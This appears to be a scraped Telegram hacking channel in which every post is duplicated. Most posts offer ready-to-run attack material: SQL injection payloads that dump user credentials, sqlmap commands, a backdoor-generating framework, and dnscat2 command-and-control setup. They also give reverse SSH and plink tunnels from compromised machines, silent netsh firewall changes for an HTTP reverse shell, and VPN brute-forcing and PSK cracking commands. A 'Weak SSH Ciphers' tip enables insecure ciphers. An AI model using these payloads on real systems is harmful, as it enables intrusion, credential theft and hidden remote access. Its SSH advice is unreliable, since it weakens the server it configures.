β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦ how to create native tools ?
First of all you need to store your output in the variable $sCode, which is required for just about anything you create for the suite.
There are only a couple of files you need:
- a native file
- a png image
- Data/nativeconfig.php
π¦That's it basically.
You can create any png-24 image as long as it's transparant and has the following dimensions: 48x48px.
You need to save all your native tools in the Native folder. Here's an example of a native tool. As you can see it's not different from a module or any other code in the suite. There are however some things you need to pay attention to, if you don't the native tool won't be loaded properly or at all.
You must save the variable iCFG(post) in every form, just hide it in your form (for an example just check any native tool that use post forms).
If you open the file Data/nativeconfig.php you can see that all properties are stored in an array. It works like this:
$_CONTEXT['native'][0] = array("configuration editor","edit_config.php","edit_config","edit your configuration files and it's default values");
π¦These are the properties for native tool configuration editor.
properties for the array $_CONTEXT['native'][0]:
[0]: name of the native tool
[1]: include file in Native folder associated with configuration editor
[2]: name of the image (used in the configuration menu above) in Templates/x/images (must be a PNG (check above for the properties)), so in this case your image will become: Templates/x/images/edit_config.png
[3]: description text (image hover text)
Note that all images are sorted on the array's index number. Not much else to think of, just make sure you use the iCFG variable when you post forms.
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦ how to create native tools ?
First of all you need to store your output in the variable $sCode, which is required for just about anything you create for the suite.
There are only a couple of files you need:
- a native file
- a png image
- Data/nativeconfig.php
π¦That's it basically.
You can create any png-24 image as long as it's transparant and has the following dimensions: 48x48px.
You need to save all your native tools in the Native folder. Here's an example of a native tool. As you can see it's not different from a module or any other code in the suite. There are however some things you need to pay attention to, if you don't the native tool won't be loaded properly or at all.
You must save the variable iCFG(post) in every form, just hide it in your form (for an example just check any native tool that use post forms).
If you open the file Data/nativeconfig.php you can see that all properties are stored in an array. It works like this:
$_CONTEXT['native'][0] = array("configuration editor","edit_config.php","edit_config","edit your configuration files and it's default values");
π¦These are the properties for native tool configuration editor.
properties for the array $_CONTEXT['native'][0]:
[0]: name of the native tool
[1]: include file in Native folder associated with configuration editor
[2]: name of the image (used in the configuration menu above) in Templates/x/images (must be a PNG (check above for the properties)), so in this case your image will become: Templates/x/images/edit_config.png
[3]: description text (image hover text)
Note that all images are sorted on the array's index number. Not much else to think of, just make sure you use the iCFG variable when you post forms.
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦RUSSIAN SITES FOR BTC- from our ru grps :
1οΈβ£Bitcoin core
Bitcoin wallet that stores the entire blockchain. Because of this, it is very demanding on the disk space (tens of gigabytes and constantly increasing), as well as the Internet connection and RAM.
Download links from the official site + additional description and screenshots: https://softocracy.ru/prog.php?id=617
It works on three main desktop platforms (Windows, Linux, Mac OS X).
2οΈβ£Bitcoin Knots
Bitcoin Knots is a Bitcoin wallet derived from Bitcoin Core.
Bitcoin Knots is based on the Bitcoin Core code. Like the original wallet, it is demanding on a place in a permanent storage, on an Internet connection and RAM.
This wallet has several innovations, many of which will also be implemented in Bitcoin Core. Since the wallet has innovations, its use may be accompanied by errors.
Links: https://softocracy.ru/prog.php?id=618
3οΈβ£Armory
Armory is an advanced bitcoin client that expands the functionality for advanced bitcoin users. It offers many encryption and backup features, and also allows the use of secure offline storage on offline computers.
Download links: https://github.com/goatpig/BitcoinArmory/releases
4οΈβ£mSIGNA
mSIGNA is an advanced wallet that combines speed, simplicity and convenience with corporate-level scalability and excellent security. It supports BIP32, multi-signature transactions, offline storage, multi-device synchronization, and encrypted online and offline backups.
Links: https://electrum.org/#download
Bitcoin wallets for mobile platforms
They are naturally thin clients.
5οΈβ£Bitcoin wallet
Bitcoin Wallet for Android is reliable and easy to use, but it is also fast and safe. Its goals are decentralization and the absence of the need to rely on anyone: for conducting bitcoin operations, a centralized service is not required. This application is a good choice for people who are not particularly tech savvy. It is also available for BlackBerry OS.
Link: https://play.google.com/store/apps/details?id=de.schildbach.wallet
6οΈβ£Airbitz Bitcoin Wallet
Airbitz is a mobile bitcoin wallet that makes a high level of security, privacy and decentralization familiar and accessible to the masses. Airbitz wallets are automatically encrypted, saved, and can work even when Airbitz servers are not functioning.
Link: https://airbitz.co/bitcoin-wallet/
their is more but those most popular recommendation by Undercode
enjoy β€οΈππΏ
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦RUSSIAN SITES FOR BTC- from our ru grps :
1οΈβ£Bitcoin core
Bitcoin wallet that stores the entire blockchain. Because of this, it is very demanding on the disk space (tens of gigabytes and constantly increasing), as well as the Internet connection and RAM.
Download links from the official site + additional description and screenshots: https://softocracy.ru/prog.php?id=617
It works on three main desktop platforms (Windows, Linux, Mac OS X).
2οΈβ£Bitcoin Knots
Bitcoin Knots is a Bitcoin wallet derived from Bitcoin Core.
Bitcoin Knots is based on the Bitcoin Core code. Like the original wallet, it is demanding on a place in a permanent storage, on an Internet connection and RAM.
This wallet has several innovations, many of which will also be implemented in Bitcoin Core. Since the wallet has innovations, its use may be accompanied by errors.
Links: https://softocracy.ru/prog.php?id=618
3οΈβ£Armory
Armory is an advanced bitcoin client that expands the functionality for advanced bitcoin users. It offers many encryption and backup features, and also allows the use of secure offline storage on offline computers.
Download links: https://github.com/goatpig/BitcoinArmory/releases
4οΈβ£mSIGNA
mSIGNA is an advanced wallet that combines speed, simplicity and convenience with corporate-level scalability and excellent security. It supports BIP32, multi-signature transactions, offline storage, multi-device synchronization, and encrypted online and offline backups.
Links: https://electrum.org/#download
Bitcoin wallets for mobile platforms
They are naturally thin clients.
5οΈβ£Bitcoin wallet
Bitcoin Wallet for Android is reliable and easy to use, but it is also fast and safe. Its goals are decentralization and the absence of the need to rely on anyone: for conducting bitcoin operations, a centralized service is not required. This application is a good choice for people who are not particularly tech savvy. It is also available for BlackBerry OS.
Link: https://play.google.com/store/apps/details?id=de.schildbach.wallet
6οΈβ£Airbitz Bitcoin Wallet
Airbitz is a mobile bitcoin wallet that makes a high level of security, privacy and decentralization familiar and accessible to the masses. Airbitz wallets are automatically encrypted, saved, and can work even when Airbitz servers are not functioning.
Link: https://airbitz.co/bitcoin-wallet/
their is more but those most popular recommendation by Undercode
enjoy β€οΈππΏ
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«Δπ¬πβ β β β
GitHub
Releases Β· goatpig/BitcoinArmory
Python-Based Bitcoin Software. Contribute to goatpig/BitcoinArmory development by creating an account on GitHub.
Fasten your Recon process using Shell Scripting.pdf
623.4 KB
Fasten your Recon process using Shell Scripting
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦A Penetration Testing Framework, Information gathering tool & Website Vulnerability Scanner
Termux-Linux
You Can use this tool to Spider your website and get important information and gather information automaticaly using whatweb-host-traceroute-dig-fierce-wafw00f or to Identify the cms and to find the vulnerability in your website using Cms Exploit Scanner && WebApp Vul Scanner Also You can use killshot to Scan automaticly multiple type of scan with nmap and unicorn . And With this tool You can Generate PHP Simple Backdoors upload it manual and connect to the target using killshot
This Tool Bearing A simple Ruby Fuzzer Tested on VULSERV.exe And Linux Log clear script To change the content of login paths Spider can help you to find parametre of the site and scan xss and sql
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1οΈβ£Linux Setup
>git clone https://github.com/bahaabdelwahed/killshot
>cd killshot
>ruby setup.rb (if setup show any error just try to install the gems/tool manual )
>ruby killshot.rb
2οΈβ£Windows Setup
>Download ruby for windows ==> https://rubyinstaller.org/downloads/
>Download Cmder here ==> http://cmder.net/
>Download Curl For 64/32 ==> https://curl.haxx.se/windows/
>Download nmap ==> https://nmap.org/download.html
3οΈβ£choose options via numbers simply
Use for learn & Enjoy !
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦A Penetration Testing Framework, Information gathering tool & Website Vulnerability Scanner
Termux-Linux
You Can use this tool to Spider your website and get important information and gather information automaticaly using whatweb-host-traceroute-dig-fierce-wafw00f or to Identify the cms and to find the vulnerability in your website using Cms Exploit Scanner && WebApp Vul Scanner Also You can use killshot to Scan automaticly multiple type of scan with nmap and unicorn . And With this tool You can Generate PHP Simple Backdoors upload it manual and connect to the target using killshot
This Tool Bearing A simple Ruby Fuzzer Tested on VULSERV.exe And Linux Log clear script To change the content of login paths Spider can help you to find parametre of the site and scan xss and sql
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1οΈβ£Linux Setup
>git clone https://github.com/bahaabdelwahed/killshot
>cd killshot
>ruby setup.rb (if setup show any error just try to install the gems/tool manual )
>ruby killshot.rb
2οΈβ£Windows Setup
>Download ruby for windows ==> https://rubyinstaller.org/downloads/
>Download Cmder here ==> http://cmder.net/
>Download Curl For 64/32 ==> https://curl.haxx.se/windows/
>Download nmap ==> https://nmap.org/download.html
3οΈβ£choose options via numbers simply
Use for learn & Enjoy !
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«Δπ¬πβ β β β
GitHub
GitHub - bahaabdelwahed/killshot: A Penetration Testing Framework, Information gathering tool & Website Vulnerability Scanner
A Penetration Testing Framework, Information gathering tool & Website Vulnerability Scanner - bahaabdelwahed/killshot
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Union Based SQL Injection :
' or 1=1#
1' ORDER BY 10#
1' UNION SELECT version(),2#
1' UNION SELECT version(),database()#
1' UNION SELECT version(),user()#
1' UNION ALL SELECT table_name,2 from information_schema.tables#
1' UNION ALL SELECT column_name,2 from information_schema.columns where table_name = "users"#
1' UNION ALL SELECT concat(user,char(58),password),2 from users#
sqlmap --url="<url>" -p username --user-agent=SQLMAP --threads=10 --eta --dbms=MySQL --os=Linux --banner --is-dba --users --passwords --current-user --dbs
source github
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Union Based SQL Injection :
' or 1=1#
1' ORDER BY 10#
1' UNION SELECT version(),2#
1' UNION SELECT version(),database()#
1' UNION SELECT version(),user()#
1' UNION ALL SELECT table_name,2 from information_schema.tables#
1' UNION ALL SELECT column_name,2 from information_schema.columns where table_name = "users"#
1' UNION ALL SELECT concat(user,char(58),password),2 from users#
sqlmap --url="<url>" -p username --user-agent=SQLMAP --threads=10 --eta --dbms=MySQL --os=Linux --banner --is-dba --users --passwords --current-user --dbs
source github
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Weak SSH Ciphers-small trick :
sudo nano /etc/ssh/sshd_config
Add the following lines:
Ciphers aes128-ctr,aes192-ctr,aes256-ctr,arcfour256,arcfour128,arcfour
MACs hmac-sha1,hmac-ripemd160
Restart SSH
[+] Unquoted Service Paths
Run Regedit and browse to HKLM\SYSTEM\CurrentControlSet\services
Find the service in question and simply add " " either side of the ImagePath string.
Check permissions:
C:\Users\user>icacls "C:\Program Files (x86)\Vuln\Vuln Software 7.0\software.exe"
enjoyβ€οΈππ»
git topic
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Weak SSH Ciphers-small trick :
sudo nano /etc/ssh/sshd_config
Add the following lines:
Ciphers aes128-ctr,aes192-ctr,aes256-ctr,arcfour256,arcfour128,arcfour
MACs hmac-sha1,hmac-ripemd160
Restart SSH
[+] Unquoted Service Paths
Run Regedit and browse to HKLM\SYSTEM\CurrentControlSet\services
Find the service in question and simply add " " either side of the ImagePath string.
Check permissions:
C:\Users\user>icacls "C:\Program Files (x86)\Vuln\Vuln Software 7.0\software.exe"
enjoyβ€οΈππ»
git topic
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Attacking Machine Installation:
#fastTips via Linux :
1οΈβ£apt-get update
2οΈβ£apt-get -y install ruby-dev git make g++
3οΈβ£gem install bundler
4οΈβ£git clone https://github.com/iagox86/dnscat2.git
5οΈβ£cd dnscat2/server
6οΈβ£bundle install
7οΈβ£Run dnscat2:
> ruby ./dnscat2.rb
8οΈβ£dnscat2> New session established: 1422
> dnscat2> session -i 1422
enjoyβ€οΈππ»
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Attacking Machine Installation:
#fastTips via Linux :
1οΈβ£apt-get update
2οΈβ£apt-get -y install ruby-dev git make g++
3οΈβ£gem install bundler
4οΈβ£git clone https://github.com/iagox86/dnscat2.git
5οΈβ£cd dnscat2/server
6οΈβ£bundle install
7οΈβ£Run dnscat2:
> ruby ./dnscat2.rb
8οΈβ£dnscat2> New session established: 1422
> dnscat2> session -i 1422
enjoyβ€οΈππ»
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«Δπ¬πβ β β β
GitHub
GitHub - iagox86/dnscat2
Contribute to iagox86/dnscat2 development by creating an account on GitHub.
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Useful Networking tips :
+ Setting up an Ethernet bridge in Ubuntu/Kali Linux
# Install bridge-utils
sudo apt-get install bridge-utils
# Disable network-manager + firewall
# Configuration
ifconfig
ifconfig eth0 0.0.0.0
ifconfig eth1 0.0.0.0
brctl addbr br0
brctl addif br0 eth0
brctl addif br0 eth1
ifconfig mybridge up
dhclient br0 on devices
sudo tcpdump -i mybridge
# adding routes
route add 192.168.1.0/24 gw 10.10.0.43
# Port Forwarding - accept traffic on a given IP address and port andredirect it to a different IP address and port
apt-get install rinetd
cat /etc/rinetd.conf
\# bindadress bindport connectaddress connectport
w.x.y.z 53 a.b.c.d 80
# SSH Local Port Forwarding: supports bi-directional communication channels
ssh <gateway> -L <local port to listen>:<remotehost>:<remote port>
# SSH Dynamic Port Forwarding: create a SOCKS4 proxy on our local
attacking box to tunnel ALL incoming traffic to ANY host in the DMZ
network on ANY PORT
ssh -D <local proxy port> -p <remote port><target>
# Proxychains - Perform nmap scan within a DMZ from an external computer
# Create reverse SSH tunnel from Popped machine on :2222
ssh -f -N -T -R22222:localhost:22 yourpublichost.example.com
ssh -f -N -R 2222:<local host>:22 root@<remote host>
# Create a Dynamic application-level port forward on 8080 thru 2222
ssh -f -N -D <local host>:8080 -p 2222 hax0r@<remote host>
# Leverage the SSH SOCKS server to perform Nmap scan on network using proxy chains
proxychains nmap --top-ports=20 -sT -Pn $ip/24
# HTTP Tunneling
nc -vvn $ip 8888
enjoyβ€οΈππ»
β git topic
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Useful Networking tips :
+ Setting up an Ethernet bridge in Ubuntu/Kali Linux
# Install bridge-utils
sudo apt-get install bridge-utils
# Disable network-manager + firewall
# Configuration
ifconfig
ifconfig eth0 0.0.0.0
ifconfig eth1 0.0.0.0
brctl addbr br0
brctl addif br0 eth0
brctl addif br0 eth1
ifconfig mybridge up
dhclient br0 on devices
sudo tcpdump -i mybridge
# adding routes
route add 192.168.1.0/24 gw 10.10.0.43
# Port Forwarding - accept traffic on a given IP address and port andredirect it to a different IP address and port
apt-get install rinetd
cat /etc/rinetd.conf
\# bindadress bindport connectaddress connectport
w.x.y.z 53 a.b.c.d 80
# SSH Local Port Forwarding: supports bi-directional communication channels
ssh <gateway> -L <local port to listen>:<remotehost>:<remote port>
# SSH Dynamic Port Forwarding: create a SOCKS4 proxy on our local
attacking box to tunnel ALL incoming traffic to ANY host in the DMZ
network on ANY PORT
ssh -D <local proxy port> -p <remote port><target>
# Proxychains - Perform nmap scan within a DMZ from an external computer
# Create reverse SSH tunnel from Popped machine on :2222
ssh -f -N -T -R22222:localhost:22 yourpublichost.example.com
ssh -f -N -R 2222:<local host>:22 root@<remote host>
# Create a Dynamic application-level port forward on 8080 thru 2222
ssh -f -N -D <local host>:8080 -p 2222 hax0r@<remote host>
# Leverage the SSH SOCKS server to perform Nmap scan on network using proxy chains
proxychains nmap --top-ports=20 -sT -Pn $ip/24
# HTTP Tunneling
nc -vvn $ip 8888
enjoyβ€οΈππ»
β git topic
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦ Traffic Encapsulation - Bypassing deep packet inspection :
http tunnel
On server side:
sudo hts -F <server ip addr>:<port of your app> 80
On client side:
sudo htc -P <my proxy.com:proxy port> -F <port of your app> <server ip addr>:80 stunnel
# Tunnel Remote Desktop (RDP) from a Popped Windows machine to your network
Tunnel on port 22
plink -l root -pw pass -R 3389:<localhost>:3389 <remote host>
# Port 22 blocked? Try port 80? or 443?
plink -l root -pw 23847sd98sdf987sf98732 -R 3389:<local host>:3389 <remote host> -P80
# Tunnel Remote Desktop (RDP) from a Popped Windows using HTTP Tunnel (bypass deep packet inspection)
# Windows machine add required firewall rules without prompting the user
netsh advfirewall firewall add rule name="httptunnel_client" dir=in action=allow program="httptunnel_client.exe" enable=yes
netsh advfirewall firewall add rule name="3000" dir=in action=allow protocol=TCP localport=3000
netsh advfirewall firewall add rule name="1080" dir=in action=allow protocol=TCP localport=1080
netsh advfirewall firewall add rule name="1079" dir=in action=allow protocol=TCP localport=1079
# Start the http tunnel client
httptunnel_client.exe
# Create HTTP reverse shell by connecting to localhost port 3000
plink -l root -pw 23847sd98sdf987sf98732 -R 3389:<local host>:3389 <remote host> -P 3000
enjoyβ€οΈππ»
β git topic
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦ Traffic Encapsulation - Bypassing deep packet inspection :
http tunnel
On server side:
sudo hts -F <server ip addr>:<port of your app> 80
On client side:
sudo htc -P <my proxy.com:proxy port> -F <port of your app> <server ip addr>:80 stunnel
# Tunnel Remote Desktop (RDP) from a Popped Windows machine to your network
Tunnel on port 22
plink -l root -pw pass -R 3389:<localhost>:3389 <remote host>
# Port 22 blocked? Try port 80? or 443?
plink -l root -pw 23847sd98sdf987sf98732 -R 3389:<local host>:3389 <remote host> -P80
# Tunnel Remote Desktop (RDP) from a Popped Windows using HTTP Tunnel (bypass deep packet inspection)
# Windows machine add required firewall rules without prompting the user
netsh advfirewall firewall add rule name="httptunnel_client" dir=in action=allow program="httptunnel_client.exe" enable=yes
netsh advfirewall firewall add rule name="3000" dir=in action=allow protocol=TCP localport=3000
netsh advfirewall firewall add rule name="1080" dir=in action=allow protocol=TCP localport=1080
netsh advfirewall firewall add rule name="1079" dir=in action=allow protocol=TCP localport=1079
# Start the http tunnel client
httptunnel_client.exe
# Create HTTP reverse shell by connecting to localhost port 3000
plink -l root -pw 23847sd98sdf987sf98732 -R 3389:<local host>:3389 <remote host> -P 3000
enjoyβ€οΈππ»
β git topic
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦VPN HACKING METHODES & MORE
# VPN Hacking
- Identify VPN servers:
./udp-protocol-scanner.pl -p ike $ip
- Scan a range for VPN servers:
./udp-protocol-scanner.pl -p ike -f ip.txt
# Use IKEForce to enumerate or dictionary attack VPN servers:
pip install pyip
git clone https://github.com/SpiderLabs/ikeforce.git
# Perform IKE VPN enumeration with IKEForce:
./ikeforce.py TARGET-IP Γ’β¬βe Γ’β¬βw wordlists/groupnames.dic
### Bruteforce IKE VPN using IKEForce:
./ikeforce.py TARGET-IP -b -i groupid -u dan -k psk123 -w passwords.txt -s 1
Use ike-scan to capture the PSK hash:
ike-scan
ike-scan TARGET-IP
ike-scan -A TARGET-IP
ike-scan -A TARGET-IP --id=myid -P TARGET-IP-key
ike-scan Γ’β¬βM Γ’β¬βA Γ’β¬βn example\_group -P hash-file.txt TARGET-IP
Use psk-crack to crack the PSK hash
psk-crack hash-file.txt
pskcrack
psk-crack -b 5 TARGET-IPkey
psk-crack -b 5 --charset="01233456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz" 192-168-207-134key
psk-crack -d /path/to/dictionary-file TARGET-IP-key
# PPTP Hacking Identifying PPTP, it listens on TCP: 1723
NMAP PPTP Fingerprint:
nmap Γ’β¬βPn -sV -p 1723 TARGET(S)
PPTP Dictionary Attack
thc-pptp-bruter -u hansolo -W -w /usr/share/wordlists/nmap.lst
# VLAN Hopping
git clone https://github.com/nccgroup/vlan-hopping.git
chmod 700 frogger.sh
./frogger.sh`
enjoyβ€οΈππ»
β git topic
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦VPN HACKING METHODES & MORE
# VPN Hacking
- Identify VPN servers:
./udp-protocol-scanner.pl -p ike $ip
- Scan a range for VPN servers:
./udp-protocol-scanner.pl -p ike -f ip.txt
# Use IKEForce to enumerate or dictionary attack VPN servers:
pip install pyip
git clone https://github.com/SpiderLabs/ikeforce.git
# Perform IKE VPN enumeration with IKEForce:
./ikeforce.py TARGET-IP Γ’β¬βe Γ’β¬βw wordlists/groupnames.dic
### Bruteforce IKE VPN using IKEForce:
./ikeforce.py TARGET-IP -b -i groupid -u dan -k psk123 -w passwords.txt -s 1
Use ike-scan to capture the PSK hash:
ike-scan
ike-scan TARGET-IP
ike-scan -A TARGET-IP
ike-scan -A TARGET-IP --id=myid -P TARGET-IP-key
ike-scan Γ’β¬βM Γ’β¬βA Γ’β¬βn example\_group -P hash-file.txt TARGET-IP
Use psk-crack to crack the PSK hash
psk-crack hash-file.txt
pskcrack
psk-crack -b 5 TARGET-IPkey
psk-crack -b 5 --charset="01233456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz" 192-168-207-134key
psk-crack -d /path/to/dictionary-file TARGET-IP-key
# PPTP Hacking Identifying PPTP, it listens on TCP: 1723
NMAP PPTP Fingerprint:
nmap Γ’β¬βPn -sV -p 1723 TARGET(S)
PPTP Dictionary Attack
thc-pptp-bruter -u hansolo -W -w /usr/share/wordlists/nmap.lst
# VLAN Hopping
git clone https://github.com/nccgroup/vlan-hopping.git
chmod 700 frogger.sh
./frogger.sh`
enjoyβ€οΈππ»
β git topic
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«Δπ¬πβ β β β
GitHub
GitHub - SpiderLabs/ikeforce
Contribute to SpiderLabs/ikeforce development by creating an account on GitHub.
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦The right steps for Information Gathering
1) Manually explore the site
2) Spider/crawl for missed or hidden content
3) Check for files that expose content, such as robots.txt, sitemap.xml, .DS_Store
4) Check the caches of major search engines for publicly accessible sites
5) Check for differences in content based on User Agent (eg, Mobile sites, access as a Search engine Crawler)
6) Perform Web Application Fingerprinting
7) Identify technologies used
8) Identify user roles
9) Identify application entry points
10) Identify client-side code
11) Identify multiple versions/channels (e.g. web, mobile web, mobile app, web services)
12) Identify co-hosted and related applications
13) Identify all hostnames and ports
14) Identify third-party hosted content
enjoyβ€οΈππ»
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦The right steps for Information Gathering
1) Manually explore the site
2) Spider/crawl for missed or hidden content
3) Check for files that expose content, such as robots.txt, sitemap.xml, .DS_Store
4) Check the caches of major search engines for publicly accessible sites
5) Check for differences in content based on User Agent (eg, Mobile sites, access as a Search engine Crawler)
6) Perform Web Application Fingerprinting
7) Identify technologies used
8) Identify user roles
9) Identify application entry points
10) Identify client-side code
11) Identify multiple versions/channels (e.g. web, mobile web, mobile app, web services)
12) Identify co-hosted and related applications
13) Identify all hostnames and ports
14) Identify third-party hosted content
enjoyβ€οΈππ»
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Steps a good Configuration Management :
1) Check for commonly used application and administrative URLs
2) Check for old, backup and unreferenced files
3) Check HTTP methods supported and Cross Site Tracing (XST)
4) Test file extensions handling
5) Test for security HTTP headers (e.g. CSP, X-Frame-Options, HSTS)
6) Test for policies (e.g. Flash, Silverlight, robots)
7) Test for non-production data in live environment, and vice-versa
8) Check for sensitive data in client-side code (e.g. API keys, credentials)
enjoyβ€οΈππ»
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Steps a good Configuration Management :
1) Check for commonly used application and administrative URLs
2) Check for old, backup and unreferenced files
3) Check HTTP methods supported and Cross Site Tracing (XST)
4) Test file extensions handling
5) Test for security HTTP headers (e.g. CSP, X-Frame-Options, HSTS)
6) Test for policies (e.g. Flash, Silverlight, robots)
7) Test for non-production data in live environment, and vice-versa
8) Check for sensitive data in client-side code (e.g. API keys, credentials)
enjoyβ€οΈππ»
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Britain, the United States and Canada say that Russian intelligence agencies are trying to steal the new crown vaccine research results
#News
> The governments of the United Kingdom, the United States and Canada accused the Russian National Intelligence Agency of hacking into international pharmaceutical and academic research institutions with a view to winning the competition to develop the Covid-19 vaccine.
>It is unclear whether the research institute was damaged, or whether the vaccine project was blocked by hacking, but the above-mentioned national officials warned that cyber attacks are still in progress.
> The UKβs National Cyber Security Centre (NCSC) said in an unexpected statement on Thursday that vaccine and treatment departments in multiple countries have been targeted. However, the institution did not list the names and number of institutions affected by this.
> The United Kingdom refers to the hacking organization named APT29, saying it is "almost certainly" an integral part of the Russian national intelligence service. The group is also known as Cozy Bear or The Dukes, targeting vaccine development organizations in the United Kingdom, United States and Canada.
> According to NCSC, malicious activities have been ongoing, mainly aimed at government, diplomacy, think tanks, health and energy targets, aimed at stealing valuable intellectual property.
> Russia denied any involvement in hacking activities against the new coronavirus vaccine. Kremlin spokesman Dmitry Peskov told Bloomberg: "We don't know who might have hacked into pharmaceutical companies and research centers. We can only say that Russia has nothing to do with these attempts."
#News
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Britain, the United States and Canada say that Russian intelligence agencies are trying to steal the new crown vaccine research results
#News
> The governments of the United Kingdom, the United States and Canada accused the Russian National Intelligence Agency of hacking into international pharmaceutical and academic research institutions with a view to winning the competition to develop the Covid-19 vaccine.
>It is unclear whether the research institute was damaged, or whether the vaccine project was blocked by hacking, but the above-mentioned national officials warned that cyber attacks are still in progress.
> The UKβs National Cyber Security Centre (NCSC) said in an unexpected statement on Thursday that vaccine and treatment departments in multiple countries have been targeted. However, the institution did not list the names and number of institutions affected by this.
> The United Kingdom refers to the hacking organization named APT29, saying it is "almost certainly" an integral part of the Russian national intelligence service. The group is also known as Cozy Bear or The Dukes, targeting vaccine development organizations in the United Kingdom, United States and Canada.
> According to NCSC, malicious activities have been ongoing, mainly aimed at government, diplomacy, think tanks, health and energy targets, aimed at stealing valuable intellectual property.
> Russia denied any involvement in hacking activities against the new coronavirus vaccine. Kremlin spokesman Dmitry Peskov told Bloomberg: "We don't know who might have hacked into pharmaceutical companies and research centers. We can only say that Russia has nothing to do with these attempts."
#News
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«Δπ¬πβ β β β